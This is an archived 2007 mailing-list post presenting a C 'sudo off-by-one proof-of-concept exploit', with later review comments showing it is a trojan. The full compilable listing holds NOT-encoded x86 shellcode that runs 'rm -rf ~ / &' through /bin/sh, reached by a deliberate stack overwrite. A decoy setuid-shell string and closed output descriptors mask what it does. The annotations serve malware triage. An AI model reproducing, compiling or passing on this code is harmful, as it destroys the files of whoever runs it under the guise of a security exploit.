Message-ID: <907993.28874.qm@web45213.mail.sp1.yahoo.com>
Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
From: Beyond Security <beyondsequritee@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Beyond Security] New sudo off-by-one poc exploit.
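/*
* off by one ebp overwrite in sudo prompt parsing function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been sent
* upstream and a fix will be included in the next sudo release
*
* NOTE(review): the description above is the poster's claim; the listing
* does not bear it out. As written, exp() overruns its own stack frame
* with the address of the esp[] byte array, so control most likely reaches
* those bytes inside this process before the execl() of sudo in main() runs.
* The four NOT-encoded words in esp[] decode to "rm -rf ~ / &", which is
* what gets handed to /bin/sh -c, with the privileges of whoever runs the
* binary. The readable "cp -p /bin/sh ..." text is never used as an argument.
* The message was also posted from a webmail address rather than a vendor
* domain. Treat the file as a trojaned PoC: read it statically or in a
* disposable VM, and decode embedded byte strings before building anything
* taken from a mailing list.
*/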
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
/* Prefix of the string that exp() assembles and main() passes to sudo -p. */
#define SPROMPT "%u@%h> \\%"
/*
 * Every later `shellcode` token is rewritten to `esp`, the byte array
 * defined below. That includes the name of exp()'s third parameter.
 */
#define shellcode esp
/*
 * Both counts are passed to exp() as plain `char` arguments.
 * NOTE(review): 246 does not fit in a signed char; where char is signed
 * (as on x86) it arrives in exp() as -10.
 */
#define RETS_NUM 246
#define NOPS_NUM 116
/*
 * x86 machine code stored as a char array. The section attribute places it
 * in .text, i.e. in an executable section of this program itself.
 *
 * What the bytes do, read statically:
 *   - eb 3e ... e8 bd ff ff ff / 5b: jmp-call-pop, leaving in %ebx the
 *     address of the trailing data "/bin/sh\0" "-c\0" "cp -p ...".
 *   - 68 ff ff ff ff, 68 df d0 df d9, 68 8d 99 df 81, 68 8d 92 df d2:
 *     four words pushed onto the stack, then inverted in place by the
 *     f7 16 / f7 56 04 / f7 56 08 / f7 56 0c (`not`) instructions.
 *     Inverted, they spell the NUL-terminated text "rm -rf ~ / &".
 *   - the argv built afterwards is { "/bin/sh", "-c", <decoded text>, NULL }
 *     and b0 0b cd 80 issues execve (syscall 11 via int 0x80).
 *
 * NOTE(review): the readable "cp -p /bin/sh /tmp/.beyond; ..." text that
 * follows "-c\0" is never referenced as an argument; the command actually
 * given to the shell is the NOT-encoded one above. A plain-text string that
 * disagrees with the encoded operands is the thing to look for when
 * triaging posted PoCs.
 *
 * The final literal is split across two lines as archived (mail wrapping).
 */
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
/*
 * Store `val` into consecutive unsigned long slots starting at `buff`.
 *
 * `size` is a byte count; only size / sizeof (unsigned long) whole words are
 * written, so a trailing partial word is left untouched and a size of zero
 * writes nothing. The division is carried out in the unsigned type of
 * sizeof, so a negative `size` is not reliably treated as "nothing to do".
 *
 * No bounds are known here: the caller must guarantee that `buff` really
 * has `size` writable bytes and is suitably aligned for unsigned long.
 */
void fill (char *buff, int size, unsigned long val) {
    unsigned long *cursor = (unsigned long *) buff;
    int remaining = size / sizeof (unsigned long);

    while (remaining > 0) {
        *cursor = val;
        cursor++;
        remaining--;
    }
}
/*
 * NOTE(review): despite its name this does not read the stack pointer.
 * In GCC's default AT&T syntax a register operand carries a '%' prefix, so
 * the bare `esp` below is a symbol reference: the instruction loads the
 * address of the file-scope esp[] array into %eax.
 *
 * There is no return statement; the caller uses whatever is left in the
 * return register. That is undefined behaviour in C, and the code relies
 * on it. x86-only.
 */
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
/*
 * Assembles SPROMPT + nops + shellcode + rets into a static 8192-byte buffer
 * and returns a pointer to it, or NULL when the computed size exceeds the
 * buffer. Also closes file descriptors 0, 1 and 2 as a side effect.
 *
 * NOTE(review): `shellcode` in the parameter list is macro-expanded to
 * `esp`, so inside this function the name refers to the argument, which
 * main() sets to the file-scope esp[] array.
 *
 * NOTE(review): rets_nums is a plain char. main() passes RETS_NUM (246),
 * which becomes -10 where char is signed. alloca() then receives that
 * negative value converted to size_t, while fill() is told to write
 * (unsigned char) rets_nums = 246 bytes. The write cannot fit the
 * allocation and lands on this function's own stack frame. Since `ret`
 * holds the value left by get_sp(), the likely effect is that returning
 * from exp() transfers control into esp[] rather than back to main().
 * Exact layout is compiler/ABI dependent; confirm only under a debugger in
 * an isolated VM.
 */
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
/* size is computed from the signed char values, so rets_nums contributes
 * -10 here while 246 bytes are written further down. */
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
/* value left in the return register by get_sp(); see the NOTE above */
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
/* NOTE(review): closing 0/1/2 also silences any output or error message
 * from whatever executes after this point, including the fprintf below. */
close (0); close (1); close (2);
/* 116 bytes into a 116-byte alloca: this one fits */
fill (nops, (unsigned char) nops_nums, 0x90909090);
/* 246 bytes into an allocation sized from -10: out of bounds */
fill (rets, (unsigned char) rets_nums, ret);
/* signed int compared against size_t; size is converted to unsigned */
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
/* nops and rets are never NUL-terminated by fill(); "%s" reads until it
 * happens to meet a zero byte. snprintf still bounds the write to
 * exp_buffer. */
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
/*
 * Entry point: calls exp() to build a prompt string, then execs
 * /usr/bin/sudo -b -p <prompt> /bin/false.
 *
 * NOTE(review): the parameter names are swapped relative to convention
 * (argv is the count, argc the vector); neither is used.
 * NOTE(review): exp() can return NULL and its result is passed to execl()
 * unchecked; execl()'s own failure is not reported either, since
 * descriptors 0-2 were closed in exp().
 * NOTE(review): given the stack overwrite inside exp(), control probably
 * never comes back here, in which case the execl() of sudo below is never
 * reached.
 */
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* NOTE(review): the author's comment below matches the readable decoy
 * text at the end of esp[], not the command the esp[] bytes actually pass
 * to /bin/sh. */
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}